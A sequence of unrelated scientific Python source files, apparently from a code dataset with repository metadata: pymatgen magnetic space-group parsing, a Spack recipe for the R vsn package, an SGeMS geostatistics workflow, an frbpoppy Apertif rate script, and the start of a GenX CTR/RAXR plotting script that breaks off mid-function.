while len(wyckoff_sites) < num_wyckoff:
m = b[1 + o] # multiplicity
label = str(b[2 + o] * m) + get_label(num_wyckoff - n)
sites = []
for j in range(m):
s = b[3 + o + (j * 22) : 3 + o + (j * 22) + 22] # data corresponding to specific Wyckoff position
translation_vec = [s[0] / s[3], s[1] / s[3], s[2] / s[3]]
matrix = [
[s[4], s[7], s[10]],
[s[5], s[8], s[11]],
[s[6], s[9], s[12]],
]
matrix_magmom = [
[s[13], s[16], s[19]],
[s[14], s[17], s[20]],
[s[15], s[18], s[21]],
]
# store string representation, e.g. (x,y,z;mx,my,mz)
wyckoff_str = "({};{})".format(
transformation_to_string(matrix, translation_vec),
transformation_to_string(matrix_magmom, c="m"),
)
sites.append(
{
"translation_vec": translation_vec,
"matrix": matrix,
"matrix_magnetic": matrix_magmom,
"str": wyckoff_str,
}
)
# only keeping string representation of Wyckoff sites for now
# could do something else with these in future
wyckoff_sites.append({"label": label, "str": " ".join([s["str"] for s in sites])})
n += 1
o += m * 22 + 2
return wyckoff_sites
def _parse_lattice(b):
"""Parses compact binary representation into list of lattice vectors/centerings."""
if len(b) == 0:
return None
raw_lattice = [b[i : i + 4] for i in range(0, len(b), 4)]
lattice = []
for r in raw_lattice:
lattice.append(
{
"vector": [r[0] / r[3], r[1] / r[3], r[2] / r[3]],
"str": "({},{},{})+".format(
Fraction(r[0] / r[3]).limit_denominator(),
Fraction(r[1] / r[3]).limit_denominator(),
Fraction(r[2] / r[3]).limit_denominator(),
),
}
)
return lattice
def _parse_transformation(b):
"""Parses compact binary representation into transformation between OG and BNS settings."""
if len(b) == 0:
return None
# capital letters used here by convention,
# IUCr defines P and p specifically
P = [[b[0], b[3], b[6]], [b[1], b[4], b[7]], [b[2], b[5], b[8]]]
p = [b[9] / b[12], b[10] / b[12], b[11] / b[12]]
P = np.array(P).transpose()
P_string = transformation_to_string(P, components=("a", "b", "c"))
p_string = "{},{},{}".format(
Fraction(p[0]).limit_denominator(),
Fraction(p[1]).limit_denominator(),
Fraction(p[2]).limit_denominator(),
)
return P_string + ";" + p_string
for i in range(8, 15):
try:
raw_data[i] = array("b", raw_data[i]) # construct array from sql binary blobs
except Exception:
# array() behavior changed, need to explicitly convert buffer to str in earlier Python
raw_data[i] = array("b", str(raw_data[i]))
self._data["og_bns_transform"] = _parse_transformation(raw_data[8])
self._data["bns_operators"] = _parse_operators(raw_data[9])
self._data["bns_lattice"] = _parse_lattice(raw_data[10])
self._data["bns_wyckoff"] = _parse_wyckoff(raw_data[11])
self._data["og_operators"] = _parse_operators(raw_data[12])
self._data["og_lattice"] = _parse_lattice(raw_data[13])
self._data["og_wyckoff"] = _parse_wyckoff(raw_data[14])
db.close()
@classmethod
def from_og(cls, id):
"""
Initialize from Opechowski and Guccione (OG) label or number.
:param id: OG number supplied as list of 3 ints or
or OG label as str
:return:
"""
db = sqlite3.connect(MAGSYMM_DATA)
c = db.cursor()
if isinstance(id, str):
c.execute("SELECT BNS_label FROM space_groups WHERE OG_label=?", (id,))
elif isinstance(id, list):
c.execute(
"SELECT BNS_label FROM space_groups WHERE OG1=? and OG2=? and OG3=?",
(id[0], id[1], id[2]),
)
bns_label = c.fetchone()[0]
db.close()
return cls(bns_label)
def __eq__(self, other):
return self._data == other._data
@property
def crystal_system(self):
"""
:return: Crystal system, e.g., cubic, hexagonal, etc.
"""
i = self._data["bns_number"][0]
if i <= 2:
return "triclinic"
if i <= 15:
return "monoclinic"
if i <= 74:
return "orthorhombic"
if i <= 142:
return "tetragonal"
if i <= 167:
return "trigonal"
if i <= 194:
return "hexagonal"
return "cubic"
@property
def sg_symbol(self):
"""
:return: Space group symbol
"""
return self._data["bns_label"]
@property
def symmetry_ops(self):
"""
Retrieve magnetic symmetry operations of the space group.
:return: List of :class:`pymatgen.core.operations.MagSymmOp`
"""
ops = [op_data["op"] for op_data in self._data["bns_operators"]]
# add lattice centerings
centered_ops = []
lattice_vectors = [l["vector"] for l in self._data["bns_lattice"]]
for vec in lattice_vectors:
if not (np.array_equal(vec, [1, 0, 0]) or np.array_equal(vec, [0, 1, 0]) or np.array_equal(vec, [0, 0, 1])):
for op in ops:
new_vec = op.translation_vector + vec
new_op = MagSymmOp.from_rotation_and_translation_and_time_reversal(
op.rotation_matrix,
translation_vec=new_vec,
time_reversal=op.time_reversal,
)
centered_ops.append(new_op)
ops = ops + centered_ops
# apply jones faithful transformation
ops = [self.jf.transform_symmop(op) for op in ops]
return ops
def get_orbit(self, p, m, tol=1e-5):
"""
Returns the orbit for a point and its associated magnetic moment.
Args:
p: Point as a 3x1 array.
m: A magnetic moment, compatible with
:class:`pymatgen.electronic_structure.core.Magmom`
tol: Tolerance for determining if sites are the same. 1e-5 should
be sufficient for most purposes. Set to 0 for exact matching
(and also needed for symbolic orbits).
Returns:
(([array], [array])) Tuple of orbit for point and magnetic moments for orbit.
"""
orbit = []
orbit_magmoms = []
m = Magmom(m)
for o in self.symmetry_ops:
pp = o.operate(p)
pp = np.mod(np.round(pp, decimals=10), 1)
mm = o.operate_magmom(m)
if not in_array_list(orbit, pp, tol=tol):
orbit.append(pp)
orbit_magmoms.append(mm)
return orbit, orbit_magmoms
def is_compatible(self, lattice, tol=1e-5, angle_tol=5):
"""
Checks whether a particular lattice is compatible with the
*conventional* unit cell.
Args:
lattice (Lattice): A Lattice.
tol (float): The tolerance to check for equality of lengths.
angle_tol (float): The tolerance to check for equality of angles
in degrees.
"""
# function from pymatgen.symmetry.groups.SpaceGroup
abc = lattice.lengths
angles = lattice.angles
crys_system = self.crystal_system
def check(param, ref, tolerance):
return all(abs(i - j) < tolerance for i, j in zip(param, ref) if j is not None)
if crys_system == "cubic":
a = abc[0]
return check(abc, [a, a, a], tol) and check(angles, [90, 90, 90], angle_tol)
if crys_system == "hexagonal" or (crys_system == "trigonal" and self.sg_symbol.endswith("H")):
a = abc[0]
return check(abc, [a, a, None], tol) and check(angles, [90, 90, 120], angle_tol)
if crys_system == "trigonal":
a = abc[0]
return check(abc, [a, a, a], tol)
if crys_system == "tetragonal":
a = abc[0]
return check(abc, [a, a, None], tol) and check(angles, [90, 90, 90], angle_tol)
if crys_system == "orthorhombic":
return check(angles, [90, 90, 90], angle_tol)
if crys_system == "monoclinic":
return check(angles, [90, None, 90], angle_tol)
return True
def data_str(self, include_og=True):
"""
Get description of all data, including information for OG setting.
:return: str
"""
# __str__() omits information on OG setting to reduce confusion
# as to which set of symops are active, this property gives
# all stored data including OG setting
desc = {} # dictionary to hold description strings
description = ""
# parse data into strings
# indicate if non-standard setting specified
if self.jf != JonesFaithfulTransformation.from_transformation_string("a,b,c;0,0,0"):
description += "Non-standard setting: .....\n"
description += self.jf.__repr__()
description += "\n\nStandard setting information: \n"
desc["magtype"] = self._data["magtype"]
desc["bns_number"] = ".".join(map(str, self._data["bns_number"]))
desc["bns_label"] = self._data["bns_label"]
desc["og_id"] = (
"\t\tOG: " + ".".join(map(str, self._data["og_number"])) + " " + self._data["og_label"]
if include_og
else ""
)
desc["bns_operators"] = " ".join([op_data["str"] for op_data in self._data["bns_operators"]])
desc["bns_lattice"] = (
" ".join([lattice_data["str"] for lattice_data in self._data["bns_lattice"][3:]])
if len(self._data["bns_lattice"]) > 3
else ""
) # don't show (1,0,0)+ (0,1,0)+ (0,0,1)+
desc["bns_wyckoff"] = "\n".join(
[
textwrap.fill(
wyckoff_data["str"],
initial_indent=wyckoff_data["label"] + " ",
subsequent_indent=" " * len(wyckoff_data["label"] + " "),
break_long_words=False,
break_on_hyphens=False,
)
for wyckoff_data in self._data["bns_wyckoff"]
]
)
desc["og_bns_transformation"] = (
"OG-BNS Transform: ({})\n".format(self._data["og_bns_transform"])
if desc["magtype"] == 4 and include_og
else ""
)
bns_operators_prefix = "Operators{}: ".format(" (BNS)" if desc["magtype"] == 4 and include_og else "")
bns_wyckoff_prefix = "Wyckoff Positions{}: ".format(" (BNS)" if desc["magtype"] == 4 and include_og else "")
# apply textwrap on long lines
desc["bns_operators"] = textwrap.fill(
desc["bns_operators"],
initial_indent=bns_operators_prefix,
subsequent_indent=" " * len(bns_operators_prefix),
break_long_words=False,
break_on_hyphens=False,
)
description += (
"BNS: {d[bns_number]} {d[bns_label]}{d[og_id]}\n"
"{d[og_bns_transformation]}"
"{d[bns_operators]}\n"
"{bns_wyckoff_prefix}{d[bns_lattice]}\n"
"{d[bns_wyckoff]}"
).format(d=desc, bns_wyckoff_prefix=bns_wyckoff_prefix)
if desc["magtype"] == 4 and include_og:
desc["og_operators"] = " ".join([op_data["str"] for op_data in self._data["og_operators"]])
# include all lattice vectors because (1,0,0)+ (0,1,0)+ (0,0,1)+
# not always present in OG setting
desc["og_lattice"] = " ".join([lattice_data["str"] for lattice_data in self._data["og_lattice"]])
desc["og_wyckoff"] = "\n".join(
[
textwrap.fill(
wyckoff_data["str"],
initial_indent=wyckoff_data["label"] + " ",
subsequent_indent=" " * len(wyckoff_data["label"] + " "),
break_long_words=False,
break_on_hyphens=False,
)
for wyckoff_data in self._data["og_wyckoff"]
]
)
og_operators_prefix = "Operators (OG): "
# apply textwrap on long lines
desc["og_operators"] = textwrap.fill(
desc["og_operators"],
initial_indent=og_operators_prefix,
subsequent_indent=" " * len(og_operators_prefix),
break_long_words=False,
break_on_hyphens=False,
)
description += ("\n{d[og_operators]}\nWyckoff Positions (OG): {d[og_lattice]}\n" "{d[og_wyckoff]}").format(
d=desc
)
elif desc["magtype"] == 4:
description += "\nAlternative OG setting exists for this space group."
return description
def __str__(self):
"""
String representation of the space group, specifying the setting
of the space group, its magnetic symmetry operators and Wyckoff
positions.
:return: str
"""
return self.data_str(include_og=False)
def _write_all_magnetic_space_groups_to_file(filename):
"""
Write all magnetic space groups to a human-readable text file.
Should contain same information as text files provided by ISO-MAG.
:param filename:
:return:
"""
s = (
"Data parsed from raw data from:\n"
"ISO-MAG, ISOTROPY Software Suite, iso.byu.edu\n"
"http://stokes.byu.edu/iso/magnetic_data.txt\n"
"Used with kind permission from Professor Branton Campbell, BYU\n\n"
)
all_msgs = []
for i in range(1, 1652):
all_msgs.append(MagneticSpaceGroup(i))
for msg in all_msgs:
s += f"\n{msg.data_str()}\n\n--------\n"
with open(filename, "w") as f:
f.write(s)
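# --- Editor's illustrative sketch (not part of the pymatgen API) -------------
# Constructing a group from its 1-1651 master index, as allowed by the
# __init__ docstring above, and inspecting a few of the properties defined in
# this module; the index used here is only an example.
def _example_usage(index=1651):
    msg = MagneticSpaceGroup(index)
    return msg.sg_symbol, msg.crystal_system, len(msg.symmetry_ops)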
|
vorwerkc/pymatgen
|
pymatgen/symmetry/maggroups.py
|
Python
|
mit
| 23,391
|
[
"CRYSTAL",
"pymatgen"
] |
729dd2ef2a6cc2371b131f378e7e00d05d4f7b50896ec82eb9324f852fe3f284
|
##############################################################################
# Copyright (c) 2013-2018, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class RVsn(RPackage):
"""The package implements a method for normalising microarray intensities,
and works for single- and multiple-color arrays. It can also be used
for data from other technologies, as long as they have similar format.
The method uses a robust variant of the maximum-likelihood estimator
for an additive-multiplicative error model and affine calibration. The
model incorporates a data calibration step (a.k.a. normalization), a
model for the dependence of the variance on the mean intensity and a
variance stabilizing data transformation. Differences between
transformed intensities are analogous to "normalized log-ratios".
However, in contrast to the latter, their variance is independent of
the mean, and they are usually more sensitive and specific in detecting
differential transcription."""
homepage = "https://www.bioconductor.org/packages/vsn/"
git = "https://git.bioconductor.org/packages/vsn.git"
version('3.44.0', commit='e54513fcdd07ccfb8094359e93cef145450f0ee0')
depends_on('r-biobase', type=('build', 'run'))
depends_on('r-affy', type=('build', 'run'))
depends_on('r-limma', type=('build', 'run'))
depends_on('r-lattice', type=('build', 'run'))
depends_on('r-ggplot2', type=('build', 'run'))
depends_on('r-hexbin', type=('build', 'run'))
depends_on('r@3.4.0:3.4.9', when='@3.44.0')
|
mfherbst/spack
|
var/spack/repos/builtin/packages/r-vsn/package.py
|
Python
|
lgpl-2.1
| 2,698
|
[
"Bioconductor"
] |
524d884d30b2f8b4c2cc18b8ce84c992a6d9d79b09954fb7603cf10aab6bcc11
|
import os
from os import listdir
from os.path import isfile, join
import sys
import numpy as np
from enum import Enum
import xml.etree.ElementTree as ET
# Get absolute path of package_directory
package_directory = os.path.dirname(os.path.abspath(__file__)).replace('core','')
# Check whether the sgems module is already loaded (i.e. we are running inside an SGeMS session)
sgems_installed = 'sgems' in sys.modules
if sgems_installed is True:
import sgems
# Module-level constants for the different distribution types
Uniform = 1
LogNormal = 2
Gaussian = 3
class trans_parameter(object):
def __init__(self,param_type,param_ranges):
self._type = param_type
self._ranges = param_ranges
def get_type(self):
if self._type is Uniform:
return 'Uniform'
elif self._type is LogNormal:
return 'Log Normal'
elif self._type is Gaussian:
return 'Gaussian'
def get_param_1_name(self):
if self._type is Uniform:
return 'Unif_min_target'
elif self._type is LogNormal:
return 'LN_mean_target'
elif self._type is Gaussian:
return 'G_mean_target'
def get_param_2_name(self):
if self._type is Uniform:
return 'Unif_max_target'
elif self._type is LogNormal:
return 'LN_variance_target'
elif self._type is Gaussian:
return 'G_variance_target'
class geostat_algo(object):
def __init__(self,default_file_path):
self.default_tree = ET.parse(default_file_path)
self.current_tree = self.default_tree
self.current_root = self.current_tree.getroot()
self.algo_name = self.current_root.find('algorithm').get('name')
#print 'Read Default Values for Algo:',self.algo_name
def update_parameter(self,p_names,p_type,p_val):
# Check if tree contains p_name
p_node = self.current_root
# p_names is a list containing all the nodes we need to traverse
for p_name in p_names:
p_node_next = p_node.find(p_name)
# if the node is not found, need to add it in
if p_node_next is None:
p_node.append(ET.Element(p_name))
p_node_next = p_node.find(p_name)
p_node = p_node_next
if p_node is None:
#print 'Error: Algorithm does not have a parameter named:',p_name
return False
else:
p_node.set(p_type,p_val)
def get_parameter(self,p_names,p_type):
# Check if tree contains p_name
p_node = self.current_root
# p_names is a list containing all the nodes we need to traverse
for p_name in p_names:
p_node = p_node.find(p_name)
if p_node is None:
return None
return p_node.get(p_type)
def delete_parameter(self,p_names):
p_node = self.current_root
# p_names is a list containing all the nodes we need to traverse
for p_name in p_names:
p_node = p_node.find(p_name)
def get_output_names(self):
output_names = []
# for SGSIM/COSGSIM
output_name = self.get_parameter(['Property_Name'],'value')
if output_name is not None:
num_realizations = int(self.get_parameter(['Nb_Realizations'],'value'))
for i in range(0,num_realizations):
output_names.append(output_name + '__real' + str(i))
return output_names
# for Tetris
output_name = self.get_parameter(['Property'],'value')
if output_name is not None:
num_realizations = int(self.get_parameter(['Nb_Realizations'],'value'))
for i in range(0,num_realizations):
output_names.append(output_name + '__real' + str(i))
return output_names
# for histogram transforms
output_name = self.get_parameter(['props'],'value')
if output_name is not None:
output_props = output_name.split(';')
output_suffix = self.get_parameter(['out_suffix'],'value')
for prop in output_props:
output_names.append(prop + output_suffix )
return output_names
def execute(self):
# Generate command string
execute_cmd = 'RunGeostatAlgorithm ' + self.algo_name + \
'::/GeostatParamUtils/XML::' + self.to_str()
return self.get_output_names(),execute_cmd
def to_str(self):
self.xmlstr = ET.tostring(self.current_root, method='xml')
return self.xmlstr
def reset(self):
self.current_tree = self.default_tree
self.current_root = self.current_tree.getroot()
class sgems_workflow(object):
def __init__(self,output_dir,grid_name,grid_size,num_real):
# Get all default algorithms
self.available_algo = dict()
default_files = [f for f in listdir(package_directory + 'data') \
if isfile(join(package_directory+'data', f))]
self.script = ''
self.output_dir = output_dir
self.grid_name = grid_name
self.grid_size = grid_size
self.num_real = num_real
# Make sure output directories exist
if not os.path.exists(output_dir):
print output_dir,'does not exist'
os.makedirs(output_dir)
# Folder where depositional properties are stored
self.prop_dir = output_dir +'Properties\\'
# Folder where facies maps are stored
self.facies_dir = output_dir + 'Facies\\'
# make directories
for path in [self.prop_dir,self.facies_dir]:
if not os.path.exists(path):
os.makedirs(path)
for algos in default_files:
if 'default.xml' in algos:
algo_name = algos.replace('_default.xml','')
self.available_algo[algo_name]=geostat_algo(package_directory+\
'data/'+algos)
def create_grid(self,name,dim_size,cell_size=[1,1,1],origin=[0,0,0]):
dim_str = "::".join([str(dim) for dim in dim_size])
cell_str = "::".join([str(cell) for cell in cell_size])
origin_str = "::".join([str(val) for val in origin])
outputstr = "::".join([name,dim_str,cell_str,origin_str])
cmd = 'NewCartesianGrid ' + outputstr + '\n\n'
self.script += cmd
if sgems_installed is True:
sgems.execute(cmd)
def save_grid(self,grid_name,obj_name,output_name):
cmd = 'SaveGeostatGrid ' + '::'.join([grid_name,self.output_dir+'\\'+
output_name,'gslib','0',obj_name])
self.script += cmd + '\n\n'
if sgems_installed is True:
sgems.execute(cmd)
def save_obj(self,grid_name,obj_names):
for facies, reals in obj_names.iteritems():
for real in reals:
output_path = 'Properties\\'+real
self.save_grid(grid_name,real,output_path)
def run_geostat_algo(self,algo_name):
output_names, cmd = self.available_algo[algo_name].execute()
self.script += cmd + '\n\n'
# If we are running inside a sgems session
if sgems_installed is True:
sgems.execute(cmd)
if len(output_names) == 1:
return output_names[0]
else:
return output_names
def histogram_transf(self,input_names,trans_param):
# Part 2: Transform clay to Gaussian
self.available_algo['trans'].reset()
self.available_algo['trans'].update_parameter(['grid'],\
'value',self.grid_name)
self.available_algo['trans'].update_parameter(['props'],\
'count',str(self.num_real))
self.available_algo['trans'].update_parameter(\
['Use_break_tie_index'],'value','0')
self.available_algo['trans'].update_parameter(\
['ref_type_target'],'value',trans_param.get_type())
self.available_algo['trans'].update_parameter(\
[trans_param.get_param_1_name()],'value',\
str(trans_param._ranges[0]))
self.available_algo['trans'].update_parameter(\
[trans_param.get_param_2_name()],'value',\
str(trans_param._ranges[1]))
self.available_algo['trans'].update_parameter(\
['props'],'value',';'.join(input_names))
output_names = self.run_geostat_algo(\
'trans')
# Names of realizations after transformation
if type(output_names) is str:
output_names = [output_names]
return output_names
def delete_grid(self,name):
pass
def execute(self):
pass
class python_workflow(object):
def __init__(self,output_dir,grid_name,grid_size):
self.output_dir = output_dir
self.grid_name = grid_name
self.grid_size = grid_size
def read_sgems_files(self,file_name):
num_header_lines = 3
raw_input = np.genfromtxt(file_name,skip_header=num_header_lines)
return raw_input
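# --- Editor's illustrative sketch --------------------------------------------
# How the classes above are meant to fit together: build a transform parameter,
# load an algorithm's default XML and push the parameter values into it before
# executing. The 'trans_default.xml' file name mirrors the 'trans' algorithm
# used by sgems_workflow.histogram_transf and is assumed to exist under data/.
def _example_usage():
    param = trans_parameter(Gaussian, [0.0, 1.0])
    algo = geostat_algo(package_directory + 'data/trans_default.xml')
    algo.update_parameter(['ref_type_target'], 'value', param.get_type())
    algo.update_parameter([param.get_param_1_name()], 'value', str(param._ranges[0]))
    algo.update_parameter([param.get_param_2_name()], 'value', str(param._ranges[1]))
    output_names, cmd = algo.execute()
    return output_names, cmd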
|
lewisli/gemsflowpy
|
core/workflow.py
|
Python
|
mit
| 9,477
|
[
"Gaussian"
] |
b017eae1abb63baa416d1ed85f58275cf29a94efe240c0c5b9fd19edff043963
|
"""Calculate the expected detection rates for apertif."""
import numpy as np
import matplotlib.pyplot as plt
from tqdm import tqdm
from frbpoppy import CosmicPopulation, Survey, SurveyPopulation, hist
from tests.convenience import plot_aa_style, rel_path
from alpha_real import EXPECTED, poisson_interval
N_DAYS = 1 # Not used in eventual result
SCALE_TO = 'parkes-htru'
pop = CosmicPopulation.complex(n_srcs=1e5, n_days=N_DAYS)
pop.generate()
apertif = Survey('wsrt-apertif', n_days=N_DAYS)
apertif.set_beam(model='apertif_real')
if SCALE_TO == 'parkes-htru':
htru = Survey('parkes-htru', n_days=N_DAYS)
htru.set_beam(model='parkes')
if SCALE_TO == 'askap':
askap = Survey('askap-fly', n_days=N_DAYS)
askap.set_beam(model='gaussian', n_sidelobes=0.5)
days_per_frbs = []
for i in tqdm(range(2000), desc='Survey Run'):
apertif_pop = SurveyPopulation(pop, apertif, mute=True)
if SCALE_TO == 'parkes-htru':
htru_pop = SurveyPopulation(pop, htru, mute=True)
n_frbs_htru = EXPECTED['parkes-htru'][0]
n_days_htru = EXPECTED['parkes-htru'][1]
scaled_n_days = n_days_htru*(htru_pop.source_rate.det / n_frbs_htru)
if SCALE_TO == 'askap':
askap_pop = SurveyPopulation(pop, askap, mute=True)
n_frbs_askap = EXPECTED['askap-fly'][0]
n_days_askap = EXPECTED['askap-fly'][1]
scaled_n_days = n_days_askap*(askap_pop.source_rate.det / n_frbs_askap)
days_per_frb = scaled_n_days / apertif_pop.source_rate.det
# print(f'{days_per_frb} days per frb')
days_per_frbs.append(days_per_frb)
days_per_frbs = np.array(days_per_frbs)
mean = np.mean(days_per_frbs)
std = np.std(days_per_frbs)
poisson_std = poisson_interval(mean)
print(f'Mean rate for apertif is {mean}')
print(f'Standard deviation of {std}')
# Plot
rates, values = hist(days_per_frbs, bin_type='lin')
plot_aa_style()
plt.step(rates, values, where='mid')
plt.xlabel(f'Apertif days per burst scaled to {SCALE_TO}')
plt.savefig(rel_path('./plots/rate_apertif_dist.pdf'))
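# --- Editor's illustrative sketch --------------------------------------------
# The scaling used above in compact form: given a reference survey that saw
# n_ref bursts in days_ref days, and the detection rates det_ref and det_new
# taken from SurveyPopulation.source_rate.det, the expected number of Apertif
# days per burst is a simple ratio.
def days_per_burst(days_ref, n_ref, det_ref, det_new):
    scaled_n_days = days_ref * (det_ref / n_ref)
    return scaled_n_days / det_new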
|
davidgardenier/frbpoppy
|
tests/rates/apertif_dist.py
|
Python
|
mit
| 2,026
|
[
"Gaussian"
] |
b4480d6c0d382af25a74b14cf544eba7c5acf0f2e1e22c40587f57a98b39cbe3
|
import numpy as num
import numpy as np
from matplotlib import pyplot
import matplotlib as mpt
import pickle,glob
import sys,os,inspect
from matplotlib import rc
from matplotlib import pyplot
from scipy.optimize import curve_fit
import matplotlib.pyplot as plt
from color_mate import color_combine_mate as set_color
def local_func():
return None
def module_path_locator(func=local_func):
return os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(inspect.getsourcefile(func)))),'dump_files')
"""
Functions to make plots of CTR, RAXR and electron density profiles using the files dumped by the GenX script (running_mode=False).
Formats for each kind of dumped file:
1. CTR dump file: [experiment_data, model]; the two items are dictionaries of the form {'HKL':[L,I,eI]} and {'HKL':[L,I]}, respectively.
2. RAXR dump file: [experiment_data, model]; the two items are dictionaries of the form {'HKL':[E,I,eI]} and {'HKL':[E,I]}, respectively.
3. e-density dump file (model): [e_data, labels], where e_data=[[z,ed1],[z,ed2],...,[z,ed_total]] and labels=['Domain1A','Domain2A',...,'Total']
4. e-density dump file (imaging): [z_plot,eden_plot,eden_domains], where
   z_plot is a list [z1,z2,z3,...,zn],
   eden_plot is a list [ed1,ed2,...,edn] giving the total e density over all domains, and
   eden_domains=[[ed_z1_D1,ed_z1_D2,...,ed_z1_Dm],[ed_z2_D1,ed_z2_D2,...,ed_z2_Dm],...,[ed_zn_D1,ed_zn_D2,...,ed_zn_Dm]] for m domains
"""
#calculate the errors for the Pb complex structure
def output_errors(edge_length=2.7,top_angle=70,error_top_angle=1,error_theta=1,error_delta1=0.02,error_delta2=0.03):
sin_alpha_left=np.sin(np.deg2rad(top_angle-error_top_angle)/2.)
sin_alpha_right=np.sin(np.deg2rad(top_angle+error_top_angle)/2.)
tan_alpha_left=np.tan(np.deg2rad(top_angle-error_top_angle)/2.)
tan_alpha_right=np.tan(np.deg2rad(top_angle+error_top_angle)/2.)
print 'error of PbO1 bond length:',edge_length/4.*(1./sin_alpha_left-1./sin_alpha_right)+error_delta1
print 'error of pbO2 bond length:',edge_length/4.*(1./sin_alpha_left-1./sin_alpha_right)
print 'error of PbOdistal bond length:',edge_length/4.*(1./sin_alpha_left-1./sin_alpha_right)+error_delta2
print 'error of O1PbO2 bond angle:',error_top_angle
print 'error of O1PbOdistal and O2PbOdistal bond angle:',error_top_angle+error_theta
print 'error of PbFe separation:',edge_length/4.*(1./tan_alpha_left-1./tan_alpha_right)
return None
bl_dl_muscovite_old={'3_0':{'segment':[[0,1],[1,9]],'info':[[2,1],[6,1]]},'2_0':{'segment':[[0,9]],'info':[[2,2.0]]},'2_1':{'segment':[[0,9]],'info':[[4,0.8609]]},'2_2':{'segment':[[0,9]],'info':[[2,1.7218]]},\
'2_-1':{'segment':[[0,3.1391],[3.1391,9]],'info':[[4,3.1391],[2,3.1391]]},'1_1':{'segment':[[0,9]],'info':[[2,1.8609]]},'1_0':{'segment':[[0,3],[3,9]],'info':[[6,3],[2,3]]},'0_2':{'segment':[[0,9]],'info':[[2,1.7218]]},\
'0_0':{'segment':[[0,20]],'info':[[2,2]]},'-1_0':{'segment':[[0,3],[3,9]],'info':[[6,-3],[2,-3]]},'0_-2':{'segment':[[0,9]],'info':[[2,-6.2782]]},\
'-2_-2':{'segment':[[0,9]],'info':[[2,-6.2782]]},'-2_-1':{'segment':[[0,3.1391],[3.1391,9]],'info':[[4,-3.1391],[2,-3.1391]]},'-2_0':{'segment':[[0,9]],'info':[[2,-6]]},\
'-2_1':{'segment':[[0,4.8609],[4.8609,9]],'info':[[4,-4.8609],[2,-6.8609]]},'-1_-1':{'segment':[[0,9]],'info':[[2,-4.1391]]},'-3_0':{'segment':[[0,1],[1,9]],'info':[[2,-1],[6,-1]]}}
bl_dl_muscovite={'0_0':{'segment':[[0,20]],'info':[[2,2]]}}
def generate_plot_files(output_file_path,sample,rgh,data,fit_mode, z_min=0,z_max=29,RAXR_HKL=[0,0,20],bl_dl=bl_dl_muscovite,height_offset=0,version=1,freeze=False):
plot_data_container_experiment={}
plot_data_container_model={}
plot_raxr_container_experiment={}
plot_raxr_container_model={}
A_list_Fourier_synthesis=[]
P_list_Fourier_synthesis=[]
HKL_list_raxr=[[],[],[]]
A_list_calculated,P_list_calculated,Q_list_calculated=sample.find_A_P_muscovite(h=RAXR_HKL[0],k=RAXR_HKL[1],l=RAXR_HKL[2])
i=0
for data_set in data:
f=np.array([])
h = data_set.extra_data['h']
k = data_set.extra_data['k']
x = data_set.x
y = data_set.extra_data['Y']
LB = data_set.extra_data['LB']
dL = data_set.extra_data['dL']
I=data_set.y
eI=data_set.error
if x[0]>100:
i+=1
A_key_list,P_key_list=[key for key in sample.domain['raxs_vars'].keys() if 'A'+str(i)+'_D' in key and 'set' not in key and 'get' not in key],[key for key in sample.domain['raxs_vars'].keys() if 'P'+str(i)+'_D' in key and 'set' not in key and 'get' not in key]
A_key_list.sort(),P_key_list.sort()
A_list_Fourier_synthesis.append(sample.domain['raxs_vars'][A_key_list[0]])
P_list_Fourier_synthesis.append(sample.domain['raxs_vars'][P_key_list[0]])
if not data_set.use:
A_list_Fourier_synthesis[-1]=0
q=np.pi*2*sample.unit_cell.abs_hkl(h,k,y)
rough = (1-rgh.beta)**2/(1+rgh.beta**2 - 2*rgh.beta*np.cos(q*sample.unit_cell.c*np.sin(np.pi-sample.unit_cell.beta)/2))
#try:
# exp_const,rgh.mu,re,auc=sample.domain['exp_factors']
# pre_factor=3e6*np.exp(-exp_const*rgh.mu/q)*(4*np.pi*re/auc)**2/q**2
#except:
# pre_factor=1
if version>=1.2:
exp_const,mu,re,auc,ra_conc=sample.domain['exp_factors']
pre_factor=3e6*np.exp(-exp_const*rgh.mu/q)*(4*np.pi*re/auc)**2/q**2
elif version>=1.1:
exp_const,mu,re,auc=sample.domain['exp_factors']
pre_factor=3e6*np.exp(-exp_const*rgh.mu/q)*(4*np.pi*re/auc)**2/q**2
else:
pre_factor=1
f=abs(sample.calculate_structure_factor(h,k,x,y,index=i,fit_mode=fit_mode,height_offset=height_offset,version=version))
f=rough*pre_factor*f*f
label=str(int(h[0]))+'_'+str(int(k[0]))+'_'+str(y[0])
plot_raxr_container_experiment[label]=np.concatenate((x[:,np.newaxis],I[:,np.newaxis],eI[:,np.newaxis]),axis=1)
plot_raxr_container_model[label]=np.concatenate((x[:,np.newaxis],f[:,np.newaxis]),axis=1)
HKL_list_raxr[0].append(h[0])
HKL_list_raxr[1].append(k[0])
HKL_list_raxr[2].append(y[0])
else:
f=np.array([])
h = data_set.extra_data['h']
k = data_set.extra_data['k']
l = data_set.x
LB = data_set.extra_data['LB']
dL = data_set.extra_data['dL']
I=data_set.y
eI=data_set.error
#make dumy hkl and f to make the plot look smoother
if l[0]>0:
l_dumy=np.arange(0.22,l[-1]+0.1,0.1)
else:
l_dumy=np.arange(l[0],l[-1]+0.1,0.1)
N=len(l_dumy)
h_dumy=np.array([h[0]]*N)
k_dumy=np.array([k[0]]*N)
q_dumy=np.pi*2*sample.unit_cell.abs_hkl(h_dumy,k_dumy,l_dumy)
rough_dumy = (1-rgh.beta)**2/(1+rgh.beta**2 - 2*rgh.beta*np.cos(q_dumy*sample.unit_cell.c*np.sin(np.pi-sample.unit_cell.beta)/2))
q_data=np.pi*2*sample.unit_cell.abs_hkl(h,k,l)
LB_dumy=[]
dL_dumy=[]
f_dumy=[]
for j in range(N):
key=None
if l_dumy[j]>=0:
key=str(int(h[0]))+'_'+str(int(k[0]))
